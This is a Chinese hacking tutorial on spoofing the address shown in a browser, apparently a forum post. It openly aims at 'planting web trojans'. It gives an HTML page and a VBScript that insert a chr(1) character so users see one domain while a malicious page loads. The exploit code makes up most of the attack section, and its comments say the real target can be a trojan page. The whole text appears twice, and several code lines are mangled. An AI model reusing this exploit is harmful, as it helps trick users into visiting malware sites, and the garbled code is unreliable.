网页木马种植方案一直都存在很大的问题,当然欺骗需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新浏览器漏洞实现域名的欺骗.....
前言
域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。
多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的:
当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url:
url的构造格式为:
说明:
url_1为用户所看到的地址,地址中不可以带"/"
special_char为一个特殊的字符,即ascii码为1的字符
url_2为恶意页面地址
利用过程
首先请看这个测试页面:
<html>
<head>
<title>域名欺骗技术实例</title>
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">
你可以看看这两个链接有什么区别:
<br>
<h1>链接1:
<script language="vbscript" src="deceive.vbs">
</script></h1>
<h1>链接2:
<a href="_blank ?>www.163.com" target="_blank">
http://www.163.com/"; target="_blank" http://ww ... ";>
www.163.com</a>
</h1>
</body>
</html>
这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码:
''''''''''''''''''deceive.vbs''''''''''''''''''''
'(以下请根据实际情况自行修改:)
url1="http://www.163.com/"
url2="http://www.google.com/"
text="http://www.163.com/"
url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
dn="/"
mouseover="onmouseover=""javascript :window.status='_blank ?>
http://";&url1&dn&"'"""
mouseout="onmouseout=""javascript :window.status=''"""
click="onclick=""javascript :navigate('"&url&"')"""
style="style=""cursor:hand"""
tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&">
<font color=""#0000ff""><u>"&text&"</u>
</font></span>"
document.write tag
'说明:
'url1是用来欺骗用户的地址.
'url2是实际访问的地址,可以是网页木马、恶意网页等.
'text是链接的文字.
'注意:(以上欺骗地址及实际地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''
现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank>http://www.163.com/",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。
网页木马种植方案一直都存在很大的问题,当然欺骗需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新浏览器漏洞实现域名的欺骗.....
前言
域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。
多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的:
当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url:
url的构造格式为:
说明:
url_1为用户所看到的地址,地址中不可以带"/"
special_char为一个特殊的字符,即ascii码为1的字符
url_2为恶意页面地址
利用过程
首先请看这个测试页面:
<html>
<head>
<title>域名欺骗技术实例</title>
</head>
<body link="#0000ff" alink="#0000ff" vlink="#0000ff">
你可以看看这两个链接有什么区别:
<br>
<h1>链接1:
<script language="vbscript" src="deceive.vbs">
</script></h1>
<h1>链接2:
<a href="_blank ?>www.163.com" target="_blank">
http://www.163.com/"; target="_blank" http://ww ... ";>
www.163.com</a>
</h1>
</body>
</html>
这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码:
''''''''''''''''''deceive.vbs''''''''''''''''''''
'(以下请根据实际情况自行修改:)
url1="http://www.163.com/"
url2="http://www.google.com/"
text="http://www.163.com/"
url="_blank ?>http://";&url1&chr(1)& ... p;url2&""
dn="/"
mouseover="onmouseover=""javascript :window.status='_blank ?>
http://";&url1&dn&"'"""
mouseout="onmouseout=""javascript :window.status=''"""
click="onclick=""javascript :navigate('"&url&"')"""
style="style=""cursor:hand"""
tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&">
<font color=""#0000ff""><u>"&text&"</u>
</font></span>"
document.write tag
'说明:
'url1是用来欺骗用户的地址.
'url2是实际访问的地址,可以是网页木马、恶意网页等.
'text是链接的文字.
'注意:(以上欺骗地址及实际地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''
现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank>http://www.163.com/",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。